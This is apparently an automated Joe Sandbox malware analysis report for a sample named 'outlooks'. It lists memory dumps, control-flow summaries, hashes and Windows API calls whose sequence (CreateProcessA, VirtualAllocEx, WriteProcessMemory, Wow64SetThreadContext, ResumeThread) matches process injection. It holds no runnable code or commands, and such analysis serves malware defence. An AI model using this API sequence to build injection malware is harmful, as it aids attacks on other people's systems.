                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0

                                                                            Control-flow Graph

                                                                            • Nodes: 239 893ad8c-893ad8d; 240 893adf9-893e572 (PostMessageW); 241 893ad8f; 243 893e574-893e57a; 244 893e57b-893e58f
                                                                            • Edges: 239->240, 239->241, 240->243, 240->244, 241->240, 243->244
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0893E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0321EC3E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1554343377.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_3210000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0893E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0893E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1549057933.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_181d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1550399878.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_183d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1549057933.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_181d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1550399878.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_183d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:

                                                                            Execution Graph

                                                                            Execution Coverage:14.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:179
                                                                            Total number of Limit Nodes:12
                                                                            execution_graph (rendered graph omitted; API nodes present in the graph: CreateActCtxA, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, GetModuleHandleW, PostMessageW)

                                                                            Control-flow Graph
                                                                            • Function 886b45b (basic blocks 886b45b-886b7a5); CreateProcessA called in block 886b5ef-886b6a9; rendered graph omitted
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0886B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 9f446cb09981499a8874f0bd4dfa0d9caca8255bad683b118f0c06cad4087259
                                                                            • Instruction ID: d68f815f60dd9d650bd6c85c05c8c5db3eb17f5f51e9f1d60a27b26838d5f141
                                                                            • Opcode Fuzzy Hash: 9f446cb09981499a8874f0bd4dfa0d9caca8255bad683b118f0c06cad4087259
                                                                            • Instruction Fuzzy Hash: ECA14771D00219CFEB20CFA8C845BEEBBB2BF48325F1481A9D809E7240DB749995CF91

                                                                            Control-flow Graph
                                                                            • Function 886b460 (basic blocks 886b460-886b7a5); CreateProcessA called in block 886b5ef-886b6a9; rendered graph omitted
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0886B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 5befc7f4edc56bbc3e19994884d821a19b50bdaaff4fb8bc594861e7c0c6377c
                                                                            • Instruction ID: cef869da0623fa432ca9d83485eaf6de037aa0e5134812f6e740cf646f181d9f
                                                                            • Opcode Fuzzy Hash: 5befc7f4edc56bbc3e19994884d821a19b50bdaaff4fb8bc594861e7c0c6377c
                                                                            • Instruction Fuzzy Hash: 04914671D003198FEB20CFA8C845BEEBBB2BF48325F1481A9D809E7240DB749995CF91

                                                                            Control-flow Graph
                                                                            • Function 32f8e34 (basic blocks 32f8e34-32f8f89); CreateActCtxA called in block 32f8e40-32f8f01; rendered graph omitted
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 032F8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1682379652.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_32f0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: dd693fcbb26c6eda268fe1c90d8d9803dccedfe86fefc419dffd0624afd299f1
                                                                            • Instruction ID: 23e67580162063ff204f0611c7e14dd1fc0b51cc09d2743246704b753731dc21
                                                                            • Opcode Fuzzy Hash: dd693fcbb26c6eda268fe1c90d8d9803dccedfe86fefc419dffd0624afd299f1
                                                                            • Instruction Fuzzy Hash: A141DDB0C00719DFDB24DFA9C844B9EFBB2BF49704F24816AD508AB251DB756946CF90

                                                                            Control-flow Graph
                                                                            • Function 32f79dc (basic blocks 32f79dc-32f8f89); CreateActCtxA called in block 32f79dc-32f8f01; rendered graph omitted
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 032F8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1682379652.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_32f0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 97d40da132377033d8312140b84f28deca352e66831bc9ae017aa65b7670690e
                                                                            • Instruction ID: 4da36a5c89c2bb0915a722fd16b00b406f7b78feb41aab1abae6b01fb6c32acd
                                                                            • Opcode Fuzzy Hash: 97d40da132377033d8312140b84f28deca352e66831bc9ae017aa65b7670690e
                                                                            • Instruction Fuzzy Hash: 4841EFB0C10719DFDB24DFA9C844B9EFBB2BF48704F24816AD508AB251DBB56946CF90

                                                                            Control-flow Graph
                                                                            • Function 886b1d1 (basic blocks 886b1d1-886b2ae); WriteProcessMemory called in block 886b236-886b275; rendered graph omitted
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0886B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: e040a4ffcc5fe98f266dbc938096d5751616c2ba44d9ca71fa1b42def92e8cbc
                                                                            • Instruction ID: 90f3a8da16902980070063f05187f3e8fabf2c2b4df6fc3ebde77e426d2ada46
                                                                            • Opcode Fuzzy Hash: e040a4ffcc5fe98f266dbc938096d5751616c2ba44d9ca71fa1b42def92e8cbc
                                                                            • Instruction Fuzzy Hash: B12135719003599FDB10CFAAC885BEEBBF5FF48324F14842AE919A7240D7789950CBA4

                                                                            Control-flow Graph
                                                                            • Function 886b1d8 (basic blocks 886b1d8-886b2ae); WriteProcessMemory called in block 886b236-886b275; rendered graph omitted
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0886B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 116816eb3f9bc2031a1f1e927da04b98404967e7292b6416c5ebe9dd4263d74c
                                                                            • Instruction ID: fc214dc34b0b5a564a9d2a83d75c2b5c0af3522f74005b5807e23b030a91f1c0
                                                                            • Opcode Fuzzy Hash: 116816eb3f9bc2031a1f1e927da04b98404967e7292b6416c5ebe9dd4263d74c
                                                                            • Instruction Fuzzy Hash: 352125719003499FDB10CFAAC885BDEBBF5FF48324F50842AE919A7240D7789954CBA4

                                                                            Control-flow Graph
                                                                            • Function 886ac30 (basic blocks 886ac30-886acfc); Wow64SetThreadContext called in block 886ac93-886acc3; rendered graph omitted
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0886ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: cb990175764697df387a71e1a73b838b73ac004e2e09b2ebcfe9f58125fa1741
                                                                            • Instruction ID: 2474dffdc171d17d4d66fabc6e979223fa75fb0afd5b81e0de6ff4ede3680f28
                                                                            • Opcode Fuzzy Hash: cb990175764697df387a71e1a73b838b73ac004e2e09b2ebcfe9f58125fa1741
                                                                            • Instruction Fuzzy Hash: D2215471D003098FDB14CFAAC885BEEBBF5EF48220F14842AD519A7340CB789A45CFA0

                                                                            Control-flow Graph
                                                                            • Function 886b2c1 (basic blocks 886b2c1-886b38e); ReadProcessMemory called in block 886b2c1-886b355; rendered graph omitted
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0886B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 3c62a8836cf4683c8c983070f814c1d2f54c7d65ae6d99743c8083f5a9c55be0
                                                                            • Instruction ID: 7b93e470869b35f235dcdc32577fcb71150176c834894ff08b29a5d3904341a9
                                                                            • Opcode Fuzzy Hash: 3c62a8836cf4683c8c983070f814c1d2f54c7d65ae6d99743c8083f5a9c55be0
                                                                            • Instruction Fuzzy Hash: 1E2136718003599FDB10CFAAC880BEEBBF5FF48320F148429E559A7240C7399551CBA1

                                                                            Control-flow Graph
                                                                            • Function 886b100 (basic blocks 886b100-886b1c1); VirtualAllocEx called in block 886b100-886b193; rendered graph omitted
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0886B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 089c192067216493fd107748cb96a98c192159cb235647be0b95f2783ec1711e
                                                                            • Instruction ID: 56b733c9dd52286993fba3cc7f15a439067342dcf369d6105ac2e654859cc998
                                                                            • Opcode Fuzzy Hash: 089c192067216493fd107748cb96a98c192159cb235647be0b95f2783ec1711e
                                                                            • Instruction Fuzzy Hash: 642156728002889FDB21CFAAD844BEEBFF5FF88324F148819E515A7250C7399911CFA0

                                                                            Control-flow Graph
                                                                            • Function 886ac38 (basic blocks 886ac38-886acfc); Wow64SetThreadContext called in block 886ac93-886acc3; rendered graph omitted
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0886ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: b907a75b0b0d23e67abdb9410867ed8e9bbb4023207aaf0c9d101061b14c6ab1
                                                                            • Instruction ID: 0b92dcd45d19cdf7d59906c7188edc3fc66925ef2c1fe8fa5bb14631fcc8de2b
                                                                            • Opcode Fuzzy Hash: b907a75b0b0d23e67abdb9410867ed8e9bbb4023207aaf0c9d101061b14c6ab1
                                                                            • Instruction Fuzzy Hash: F1211571D003098FDB14DFAAC885BEEBBF5EF48324F14842AD519A7240CB78A945CFA4

                                                                            Control-flow Graph
                                                                            • Function 886b2c8 (basic blocks 886b2c8-886b38e); ReadProcessMemory called in block 886b2c8-886b355; rendered graph omitted
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0886B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 7fddd316822043601b060e13daa42480b16ffc696711c8b2547e21a671ab8c6e
                                                                            • Instruction ID: 9c0866c13ebd8d8f7569989da184e0cd6a079cc9eda45db54932b41e45efabee
                                                                            • Opcode Fuzzy Hash: 7fddd316822043601b060e13daa42480b16ffc696711c8b2547e21a671ab8c6e
                                                                            • Instruction Fuzzy Hash: F32128719003499FDB10CFAAC844BDEBBF5FF48320F108429E519A7240C7799550CBA4

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: ab6b336361b0d38da5d4d2a377ebce487c95f66ac7c3dedd2bd04ce537f42ba7
                                                                            • Instruction ID: 6673c47bed914e8358cc9717f391fc883119a0b8b4ec7131e431b51f50da5439
                                                                            • Opcode Fuzzy Hash: ab6b336361b0d38da5d4d2a377ebce487c95f66ac7c3dedd2bd04ce537f42ba7
                                                                            • Instruction Fuzzy Hash: 44115B718003588FDB14DFAAC8457EEFBF5EF49724F248819D519A7240C779A940CFA5

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0886B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 5580e40f0c3926cdd8b3bfc9138c51a94f6033102f438398a9e649b2ad2ce2c8
                                                                            • Instruction ID: 099cc174231d7ebb12519ece395d76c7516fdd78ea59657d3d4c07f091ca0b1e
                                                                            • Opcode Fuzzy Hash: 5580e40f0c3926cdd8b3bfc9138c51a94f6033102f438398a9e649b2ad2ce2c8
                                                                            • Instruction Fuzzy Hash: 0F1126718003499FDB10DFAAC844BDEBBF5EF48724F148819E519A7250C779A950CFA0

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 9d739a91614a821fb64952b64f4285617c77b5dc93f114d25d90d059ded52b41
                                                                            • Instruction ID: d44f4baae3233f9e9313084c48d800476add3a563d4e5a70d01548059ed8797d
                                                                            • Opcode Fuzzy Hash: 9d739a91614a821fb64952b64f4285617c77b5dc93f114d25d90d059ded52b41
                                                                            • Instruction Fuzzy Hash: A1113A719003488FDB14DFAAC8447DEFBF5EF88724F248419D519A7240CB79A544CFA4
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0886E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 560c69ff5d5c5ebfede3f48697027b56e61bb84e5b80f4880903e223193532be
                                                                            • Instruction ID: 8a9d38e3dcb96c277e9c566f3502c35f063f85e4d2f362712376a8e9112a1340
                                                                            • Opcode Fuzzy Hash: 560c69ff5d5c5ebfede3f48697027b56e61bb84e5b80f4880903e223193532be
                                                                            • Instruction Fuzzy Hash: DF1103B5800348DFDB10DF9AC888BDEBBF8EB48324F208419E518A7600D379A954CFA1

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 032FEC3E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1682379652.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_32f0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 14dea253ad43db75919fb6965f126e1a71579b68cfb44d15e79ad4eb01507447
                                                                            • Instruction ID: 20d4bc500929d7e9c1642471ffb776b9e38f8a2df700787e62877af2fea2b2b4
                                                                            • Opcode Fuzzy Hash: 14dea253ad43db75919fb6965f126e1a71579b68cfb44d15e79ad4eb01507447
                                                                            • Instruction Fuzzy Hash: 37110FB5C002498FDB10CF9AC844ADEFBF5EB88324F15842AD519A7210C379A545CFA1
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0886E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 625d2da82f536ea6f7d2cb4f39564d7c00331078de6267443798d21802e73994
                                                                            • Instruction ID: 1c4b223f78f2efb8def0bda9a624051ae2609372d6eeb1ccc2761737848141d3
                                                                            • Opcode Fuzzy Hash: 625d2da82f536ea6f7d2cb4f39564d7c00331078de6267443798d21802e73994
                                                                            • Instruction Fuzzy Hash: 2F1136B5800248CFDB10DF9AD488BDEBFF4FB48320F208459E514A7200C379A944CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1678049769.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_307d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c618966d0574d63f7421dbb26b386046286fa1a9d52888cfdf5e68a9439f937
                                                                            • Instruction ID: 5f9dc29730e2944b5cfdcfdc015f407d8aca263f44973af49bdc5bfe50dceeeb
                                                                            • Opcode Fuzzy Hash: 8c618966d0574d63f7421dbb26b386046286fa1a9d52888cfdf5e68a9439f937
                                                                            • Instruction Fuzzy Hash: C22104B5A04344DFDB14DF10D9C4B16BBA5FF84314F24C9ADD84A4B256C33AD447CAA6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1678049769.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_307d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93645d1f2ab4847bf590bcff4a7d134303098b4301fe01c62915314be4a3bc1d
                                                                            • Instruction ID: 8e26bcacbe2e82459b4da98813cbb4863257c2c3ece0f3fe729df0507fac6165
                                                                            • Opcode Fuzzy Hash: 93645d1f2ab4847bf590bcff4a7d134303098b4301fe01c62915314be4a3bc1d
                                                                            • Instruction Fuzzy Hash: FF2184755093808FCB12CF24D994715BFB1EF46214F28C5DAD8498F6A7C33AD44ACBA2

                                                                            Execution Graph

                                                                            Execution Coverage:10%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:117
                                                                            Total number of Limit Nodes:13
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d8034836f0a214b0d1f7caa6cef171db7aed9b442c93c1325c985e7ac0fe410
                                                                            • Instruction ID: 36f45305ab3d6513aba09922ec6596bf6438202b717f6a49efbb8b258d503872
                                                                            • Opcode Fuzzy Hash: 5d8034836f0a214b0d1f7caa6cef171db7aed9b442c93c1325c985e7ac0fe410
                                                                            • Instruction Fuzzy Hash: BB82BD70B107428FDB19CB68C49466EBBF6BF88311F14892DE54ADB791CB34E942CB81

                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 4e13af1a00e98a826b6b4272723f91786bdac8e6e73e32a161b100aa9e0b2a49
                                                                            • Instruction ID: 6127e0a3962cfacd2b4bb05da939dc02ffc1a3b76ffab579320d22ce416351c1
                                                                            • Opcode Fuzzy Hash: 4e13af1a00e98a826b6b4272723f91786bdac8e6e73e32a161b100aa9e0b2a49
                                                                            • Instruction Fuzzy Hash: 23716AB0A00B058FEB24DF6AD44475ABBF5FF88300F10892ED48AE7A50DB75E845CB91

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: j^
                                                                            • API String ID: 0-2120829721
                                                                            • Opcode ID: 43a31363b115ff803572fc2216efef823d447d329e198ea7dbb3132036f5601a
                                                                            • Instruction ID: 65d819486230b7724e50699b2b2d47c446791ba5b67c797d3e62ce69dcba78b3
                                                                            • Opcode Fuzzy Hash: 43a31363b115ff803572fc2216efef823d447d329e198ea7dbb3132036f5601a
                                                                            • Instruction Fuzzy Hash: A6B17D21E287A6DBE712B63C9C507EA3B61AFC2732F44016BC192CF191DF54845AC7D6

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0193674E,?,?,?,?,?), ref: 0193680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 92867dfff5f540232663c8fd1e86f97f959c0148f09ba28361a38415bb5f5f8e
                                                                            • Instruction ID: cc69d61dc78dde7745fdb28ad67cba25bc1f74a4c50de4c66523d92a78649e47
                                                                            • Opcode Fuzzy Hash: 92867dfff5f540232663c8fd1e86f97f959c0148f09ba28361a38415bb5f5f8e
                                                                            • Instruction Fuzzy Hash: 9D414B76900208AFDF01CF99D844ADEBFF9FB88310F14801AE918A7311D735A915CFA5

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01937421
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 3ab24a64bfcaf289e84ca35df07a15ac0884b6f0b29c104ebc20cb27a74dbdad
                                                                            • Instruction ID: 17700d1c63478dde39bc677966637f7ee2a5655ad479c05f01f1fb50ce807c75
                                                                            • Opcode Fuzzy Hash: 3ab24a64bfcaf289e84ca35df07a15ac0884b6f0b29c104ebc20cb27a74dbdad
                                                                            • Instruction Fuzzy Hash: 9C41A3B0C0071DCBDB24DFA9C848B9EBBF6BF89715F20805AD508AB251DB756946CF90

                                                                            Control-flow Graph

                                                                            • Graph not reproduced: function starting at 1937364 (calls CreateActCtxA); basic-block edge list omitted
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01937421
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 76f8d768eee364a53674bea2d79ee318ed25b8732e3467fd748d619e706555ee
                                                                            • Instruction ID: 5347d8b9f3fcc38b52b2c9ee31cfe0894d7adb5c5b59e16180246bf5810bc328
